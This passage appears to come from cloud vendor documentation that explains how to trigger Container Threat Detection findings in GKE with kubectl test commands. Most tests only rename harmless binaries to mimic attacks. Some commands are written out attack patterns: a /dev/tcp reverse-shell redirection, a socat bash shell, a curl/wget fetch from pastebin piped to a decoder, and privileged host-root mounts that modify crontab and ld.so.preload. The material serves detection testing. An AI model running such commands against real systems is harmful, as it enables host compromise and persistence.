     tag="ktd-test-socat-reverse-shell-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"apt-get update && apt-get install socat -y && (socat UNIX-LISTEN:/tmp/shell.sock STDOUT &) && sleep 2 && timeout 5s socat UNIX-CONNECT:/tmp/shell.sock EXEC:/bin/bash,pty,stderr,setsid,sigint,sane || true"

   • ARM node:

     tag="ktd-test-socat-reverse-shell-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"apt-get update && apt-get install socat -y && (socat UNIX-LISTEN:/tmp/shell.sock STDOUT &) && sleep 2 && timeout 5s socat UNIX-CONNECT:/tmp/shell.sock EXEC:/bin/bash,pty,stderr,setsid,sigint,sane || true"

This test procedure creates anExecution: Socat Reverse Shell Detectedfinding that you can view in Security Command Center, andin Cloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Execution: Suspicious Cron Modification (Preview)

To trigger a Suspicious Cron Modification detection, modify the host's/etc/crontab file from a container. This example deploys the latest Ubuntu24.04 image, mounting the host's root file system into the container. It thenupdates the crontab file.

This is a file monitoring detector and hasspecific GKE version requirements.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a command to modify the host's/etc/crontab file.

   • x86 node:

     tag="ktd-test-cron-mod-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/crontab"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

   • ARM node:

     tag="ktd-test-cron-mod-arm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/crontab"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" }] }}'

     This test procedure triggers a Suspicious Cron Modification finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Execution: Suspicious OpenSSL Shared Object Loaded

To trigger anExecution: Suspicious OpenSSL Shared Object Loaded finding,execute theopenssl engine command with an argument that is a file that ends with the.so extension. This example uses the latest Ubuntu 24.04 image. The/bin/ls utility is copied and renamed to/tmp/openssl. This renamed binary isthen executed with theengine and fake.so file arguments. The execution ofopenssl engine with a.so file is flagged as suspicious because it mimicsthe behavior of a shared object being loaded to execute malicious code.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Executeopenssl engine with a fake shared object library argument:

   • x86 node:

     tag="ktd-test-suspicious-openssl-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/openssl; /tmp/openssl engine /tmp/fakelib.so"

   • ARM node:

     tag="ktd-test-suspicious-openssl-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/openssl; /tmp/openssl engine /tmp/fakelib.so"

This test procedure creates anExecution: Suspicious OpenSSL Shared Object Loadedfinding that you can view in Security Command Center, andin Cloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Exfiltration: Launch Remote File Copy Tools In Container

To trigger anExfiltration: Launch Remote File Copy Tools In Containerfinding, execute a common remote file copy tool within a container. This exampleuses the latest Ubuntu 24.04 image. The/bin/ls utility is copied and renamedto/tmp/rsync and then executed to retrieve a file from a remote, potentiallymalicious, source. The execution of such a tool with remote file retrievalarguments within a container is flagged as suspicious, as it could indicate anattempt to download and execute malicious code or exfiltrate data.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a remote file copy tool, likersync, and execute it:

   • x86 node:

     tag="ktd-test-launch-remote-file-copy-tools-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/rsync; /tmp/rsync"

   • ARM node:

     tag="ktd-test-launch-remote-file-copy-tools-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/rsync; /tmp/rsync"

This test procedure creates anExfiltration: Launch Remote File Copy ToolsIn Container finding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Impact: Detect Malicious Cmdlines

To trigger anImpact: Detect Malicious Cmdlines (Preview) finding, theexecution of a command line with known malicious patterns or arguments must beobserved within a container. This example uses the latest Ubuntu 24.04 image. Itinvolves copying the/bin/ls binary and renaming that copy toipfs. Therenamed binary is then executed. This behavior is flagged as suspicious becauseit can indicate an attempt to execute malicious code or bypass securitycontrols.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a binary likeipfs:

   • x86 node:

     tag="ktd-test-detect-malicious-cmdlines-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/ipfs; /tmp/ipfs"

   • ARM node:

     tag="ktd-test-detect-malicious-cmdlines-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/ipfs; /tmp/ipfs"

This test procedure creates anImpact: Detect Malicious Cmdlinesfinding that you can view in Security Command Center and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activate the Premium orEnterprise tier of Security Command Center.

Impact: Remove Bulk Data From Disk

To trigger anImpact: Remove Bulk Data From Disk finding, place a binarycapable of data deletion or overwriting in your container and execute it. Thisexample uses the latest Ubuntu 24.04 image. It involves copying the/bin/lsbinary and renaming that copy toshred (or a similar utility designed forsecure file deletion). The renamed binary is then executed. This action isflagged as suspicious because it mimics the behavior often seen when attemptsare made to remove large amounts of data from a disk within a containerizedenvironment.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Introduce a file or data deletion binary likeshred and execute it:

   • x86 node:

     tag="ktd-test-remove-bulk-data-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/shred; /tmp/shred"

   • ARM node:

     tag="ktd-test-remove-bulk-data-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/shred; /tmp/shred"

This test procedure creates anImpact: Remove Bulk Data From Diskfinding that you can view in Security Command Center, and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activate the Premium orEnterprise tier of Security Command Center.

Impact: Suspicious crypto mining activity using the Stratum Protocol

To trigger anImpact: Suspicious crypto mining activity using the StratumProtocol finding, a binary needs to be executed within a container witharguments that resemble those used by crypto mining software communicating usingthe Stratum protocol. The example uses the latest Ubuntu 24.04 image. It copies/bin/ls and renames that copy to a mock binary (presumably to simulate acrypto miner). This renamed binary is then executed with arguments that includestratum+tcp or similar Stratum protocol indicators. This activity is flaggedas suspicious because it mimics the network communication patterns of cryptomining software within containerized environments.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Introduce a utility binary likecurl and execute it with arguments thatresemble those used by crypto mining software communicating using the Stratumprotocol:

   • x86 node:

     tag="ktd-test-detect-crypto-using-stratum-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/curl; /tmp/curl --url=stratum+tcp"

   • ARM node:

     tag="ktd-test-detect-crypto-using-stratum-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/curl; /tmp/curl --url=stratum+tcp"

This test procedure creates anImpact: Suspicious crypto mining activityusing the Stratum Protocol finding that you can view in Security Command Center, andin Cloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

You might also see an additional finding for thebash command that you run inthis test. This behavior is normal, and you can ignore the additional finding.

Malicious Script Executed

To trigger a Malicious Script Executed finding, you can execute the scriptin the following procedure in your container.

The procedure deploys the latest Ubuntu 24.04 image, copies a script thatappears malicious, and then executes it. To trigger a detection, ascript must appear malicious to the detector.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute the following script in a new container.

   This inline Bourne shell script originated from ahoneypot. However,it has been modified so that it does not execute the malicious binary,so running the script won't cause malicious activity in your container.The binary at the referenced URL may have been removed and attemptingto follow the URL will result in a 404 error. This is expected.Theattempt to download, decode, and execute a binary using aninline script is what triggers the detection.

   • x86 node:

     tag="ktd-test-malicious-script-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c\"(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"

   • ARM node:

     tag="ktd-test-malicious-script-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--sh-c\"(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"

This test procedure creates a Malicious Script Executed finding that youcan view in Security Command Center and in Cloud Logging if you've configuredlogging for Container Threat Detection. Viewing findings in Cloud Logging isonly available if you activate the Premium or Enterprisetier of Security Command Center.

Malicious URL Observed

To trigger a Malicious URL Observed finding, execute a binary and providea malicious URL as an argument.

The following example deploys an Ubuntu 24.04image and executes/bin/curl to access a sample malware URL from theSafe Browsing service.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Executecurl and provide a malicious URL as an argument:

   • x86 node:

     tag="ktd-test-malicious-url-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"url="https://testsafebrowsing.appspot.com/s/malware.html"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c"cp /bin/ls /tmp/curl; /tmp/curl$url 2> /dev/null || true"

   • ARM node:

     tag="ktd-test-malicious-url-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"url="https://testsafebrowsing.appspot.com/s/malware.html"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":      {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":      "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",      "value": "arm64" } ]}}'\"$tag"--sh-c"cp /bin/ls /tmp/curl; /tmp/curl$url 2> /dev/null || true"

This test procedure triggers a Malicious URL Observed finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Persistence: Modify ld.so.preload (Preview)

To trigger ald.so.preload modification detection, modify the host's/etc/ld.so.preload file. This example deploys the latest Ubuntu 24.04 image,mounting the host's root file system into the container, and then updates/etc/ld.so.preload.

This is a file monitoring detector and hasspecific GKE version requirements.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a binary that modifies the host's/etc/ld.so.preload file.

   • x86 node:

     tag="ktd-test-ld-preload-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["/bin/touch", "/host/etc/ld.so.preload"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

   • ARM node:

     tag="ktd-test-ld-preload-arm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["/bin/touch", "/host/etc/ld.so.preload"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" }] }}'

This test procedure triggers ald.so.preload modification finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)

To trigger aPrivilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)finding, execute thesudo binary with the-u#-1 parameter. This examplecopies the/bin/ls binary to imitate thesudo binary and executes it with thespecified parameter.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Start a binary with/bin/echo redirection to the Google public DNS:

   • x86 node:

     tag="ktd-test-abuse-sudo-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/sudo; /tmp/sudo -u#-1; sleep 10"

   • ARM node:

     tag="ktd-test-abuse-sudo-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/sudo; /tmp/sudo -u#-1; sleep 10"

This test procedure creates aPrivilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)finding you can view in Security Command Center, and in Cloud Logging if you'veconfigured Logging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Privilege Escalation: Fileless Execution in/dev/shm

To trigger anPrivilege Escalation: Fileless Execution in /dev/shm finding,a process must be executed from the/dev/shm in-memory file system.This example uses the latest Ubuntu 24.04 image. The/bin/echo utility iscopied to/dev/shm/echo. This renamed binary is then executed.The execution of a file under/dev/shm is flagged as suspicious because itmimics the behavior of an object trying to execute in memory to avoid file-baseddetections.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Create a privileged container and execute a program from an in-memory file system:

   • x86 node:

     tag="ktd-test-fileless-dev-shm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"spec": {"containers": [{"name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest", "securityContext": {"privileged": true}, "command": ["bash", "-c", "cp /bin/echo /dev/shm/echo; chmod +x /dev/shm/echo; mount -o remount,exec /dev/shm; /dev/shm/echo \"Hello from /dev/shm\""]}]}}'\"$tag"

   • ARM node:

     tag="ktd-test-fileless-dev-shm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": {   "containers": [{"name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest", "securityContext": {"privileged": true}, "command": ["bash", "-c", "cp /bin/echo /dev/shm/echo; chmod +x /dev/shm/echo; mount -o remount,exec /dev/shm; /dev/shm/echo \"Hello from /dev/shm\""]}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"

This test procedure creates anPrivilege Escalation: Fileless Execution in /dev/shmfinding that you can view in Security Command Center, andin Cloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)

To trigger aPrivilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)finding, execute apkexec binary with theGCONV_PATH environment variable setas a non-root user. This example copies the/bin/ls binary to imitate thepkexec binary and executes it with the specified parameter as user ID 1000.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Start a binary with/bin/echo redirection to the Google public DNS:

   • x86 node:

     tag="ktd-test-polkit-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": {   "securityContext": { "runAsUser": 1000 }}}'\"$tag"--bash-c\"cp /bin/ls /tmp/pkexec; GCONV_PATH=junk /tmp/pkexec; sleep 10"

   • ARM node:

     tag="ktd-test-polkit-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": {   "securityContext": { "runAsUser": 1000 }, "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/pkexec; GCONV_PATH=junk /tmp/pkexec; sleep 10"

This test procedure creates aPrivilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)finding you can view in Security Command Center, and in Cloud Logging if you'veconfigured Logging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)

To trigger aPrivilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)finding, execute thesudo binary as a non-root user with the-s parameterand a parameter that ends with\`. This example copies the/bin/lsbinary toimitate thesudo` binary and executes it with the specified parameters.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Start a binary with/bin/echo redirection to the Google public DNS:

   • x86 node:

     tag="ktd-test-sudo-potential-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": {   "securityContext": { "runAsUser": 1000 }}}'\"$tag"--bash-c\'cp /bin/ls /tmp/sudo; /tmp/sudo -s "123\\"; sleep 10'

   • ARM node:

     tag="ktd-test-sudo-potential-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": {   "securityContext": { "runAsUser": 1000 },   "nodeSelector": { "kubernetes.io/arch":"arm64" }, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\'cp /bin/ls /tmp/sudo; /tmp/sudo -s "123\\"; sleep 10'

This test procedure creates aPrivilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)finding you can view in Security Command Center, and in Cloud Logging if you'veconfigured Logging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Reverse Shell

To trigger a Reverse Shell finding, start a binary withstdin redirection to aTCP connected socket. This example copies/bin/echo to/tmp/sh,then starts/tmp/sh with redirection to theGoogle public DNS8.8.8.8 on the DNS port. Nothing is printed when you run this example. Toprevent any external code injection through aman-in-the-middle (MITM) attack,this example doesn't use the/bin/sh binary.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Start a binary with/bin/echo redirection to the Google public DNS:

   • x86 node:

     tag="ktd-test-reverse-shell-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1"

   • ARM node:

     tag="ktd-test-reverse-shell-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1"

This test procedure creates a Reverse Shell finding you can view inSecurity Command Center, and in Cloud Logging if you've configuredLogging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Unexpected Child Shell

To test theUnexpected Child Shell detector, you can create a process tree that includes a child shell process.

The following example creates anconsul->dash process tree, which can be detected by theUnexpected Child Shell detector. This test is safe because it uses only built-in binaries. This example does the following:

1. Creates a copy of thesh process and names itconsul.
2. Copies theecho process and names itdash.
3. Invokes the copieddash process in the copiedconsul process.

To trigger anUnexpected Child Shell finding, do the following:

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Use the mockconsul process to invoke a mock shell:

   • x86 node:

     tag="ktd-test-unexpected-child-shell-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-ti\--imageubuntu"$tag"\--command--/bin/sh-c\'cp /bin/sh /tmp/consul; cp /bin/echo /tmp/sh; \      /tmp/consul -c "/tmp/sh child ran successfully & wait"'

   • ARM node:

     tag="ktd-test-unexpected-child-shell-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-ti\--imageubuntu\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--command--/bin/sh-c\'cp /bin/sh /tmp/consul; cp /bin/echo /tmp/sh; \      /tmp/consul -c "/tmp/sh child ran successfully & wait"'

This test procedure creates anUnexpected Child Shell finding that you canview in Security Command Center. If Logging is configured for Container Threat Detection and you have Security Command Center Premium or Enterprise activated at the organization level, then you can view thefinding in Cloud Logging too.

What's next

• Learn how touse Container Threat Detection.